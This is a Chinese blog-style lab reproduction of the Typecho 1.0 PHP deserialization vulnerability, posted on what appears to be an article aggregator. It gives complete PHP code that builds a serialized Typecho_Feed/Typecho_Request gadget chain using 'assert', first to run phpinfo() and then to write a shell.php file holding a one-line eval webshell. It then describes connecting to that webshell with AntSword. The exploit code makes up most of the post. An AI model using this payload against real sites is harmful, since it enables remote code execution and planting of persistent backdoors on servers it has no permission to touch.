当前位置: 首页 > news >正文

反序列化漏洞复现(typecho)

文章目录

  • 执行phpinfo
  • getshell

执行phpinfo

将下面这段代码复制到一个php文件,命名为typecho_1.0-14.10.10_unserialize_phpinfo.php,代码中定义的类名与typecho中的类相同,是它能识别的类:

<?php
class Typecho_Feed{const RSS1 = 'RSS 1.0';const RSS2 = 'RSS 2.0';const ATOM1 = 'ATOM 1.0';const DATE_RFC822 = 'r';const DATE_W3CDTF = 'c';const EOL = "\n";private $_type;private $_items;public function __construct(){$this->_type = $this::RSS2;$this->_items[0] = array('title' => '1','link' => '1','date' => 1508895132,'category' => array(new Typecho_Request()),'author' => new Typecho_Request(),);}
}class Typecho_Request{private $_params = array();private $_filter = array();public function __construct(){$this->_params['screenName'] = 'phpinfo()';$this->_filter[0] = 'assert';}
}$exp = array('adapter' => new Typecho_Feed(),'prefix' => 'typecho_'
);echo base64_encode(serialize($exp));
?>

将文件放到虚拟机C:\phpstudy_2016\WWW\unserialize的目录下,打开后可以获得它的base64编码:

在这里插入图片描述

在typecho主页用hackbar进行代码注入,注入成功就说明此处存在RCE漏洞:

在这里插入图片描述

注入成功(说明此处存在RCE漏洞,也可以尝试getshell),回显出phpinfo界面:

在这里插入图片描述

getshell

同上,将这段利用代码复制到php文件中:

<?php
class Typecho_Feed{const RSS1 = 'RSS 1.0';const RSS2 = 'RSS 2.0';const ATOM1 = 'ATOM 1.0';const DATE_RFC822 = 'r';const DATE_W3CDTF = 'c';const EOL = "\n";private $_type;private $_items;public function __construct(){$this->_type = $this::RSS2;$this->_items[0] = array('title' => '1','link' => '1','date' => 1508895132,'category' => array(new Typecho_Request()),'author' => new Typecho_Request(),);}
}class Typecho_Request{private $_params = array();private $_filter = array();public function __construct(){$this->_params['screenName'] = "fputs(fopen('shell.php', w), '<?php phpinfo();@eval(\$_REQUEST[777])?>')";$this->_filter[0] = 'assert';}
}$exp = array('adapter' => new Typecho_Feed(),'prefix' => 'typecho_'
);echo base64_encode(serialize($exp));
?>

打开:
在这里插入图片描述

在hackbar中执行:

在这里插入图片描述

页面回显正常:

在这里插入图片描述

在typecho根目录下已经成功写入一个shell.php文件,里面包含一句话木马,并可以正常访问:

在这里插入图片描述

蚁剑测试连接成功:

在这里插入图片描述

成功获取webshell:

在这里插入图片描述

http://www.lryc.cn/news/157681.html

相关文章:

  • QT设计一个小闹钟
  • MybatisPlus(3)
  • 安全计算环境技术测评要求项
  • Excel快捷键表
  • Windows Server 系统各版本及授权说明(附下载地址
  • 【智慧工地源码】物联网和传感器技术在智慧工地的应用
  • 计算机安全学习笔记(IV):基于角色的访问控制 - RBAC
  • MFC中的Button修改颜色的方法
  • 【算法】选择排序
  • golang之context实用记录
  • 音视频FFmpeg简单理解学习,必学技术
  • 一款内网信息收集利用工具
  • 数据库表的操作
  • Golang开发--channel的使用
  • SQL sever中表管理
  • CSSoverflow 属性
  • 08:STM32----DMA数据转运
  • Golang 程序漏洞检测利器 govulncheck(二):漏洞数据库详解
  • [JDK8下的HashMap类应用及源码分析] 数据结构、哈希碰撞、链表变红黑树
  • 高等数学刷题
  • lintcode 1840 · 矩阵还原【中等 vip 二维前缀和数组】
  • VMware虚拟机+Centos7 配置静态,动态IP
  • 【C++精华铺】10.STL string模拟实现
  • 微信小程序开发---事件的绑定
  • 基于Hata模型的BPSK调制信号小区覆盖模拟matlab完整程序分享
  • 音视频 ffmpeg视频裁剪
  • Web3数据云OORT推出商用版智能代理构建平台:OORT TDS
  • ChatGPT:革命性的自然语言处理技术
  • 利用frps搭建本地自签名https服务的透传
  • 安卓手机安装Linux然后在其中安装(jdk,MySQL,git)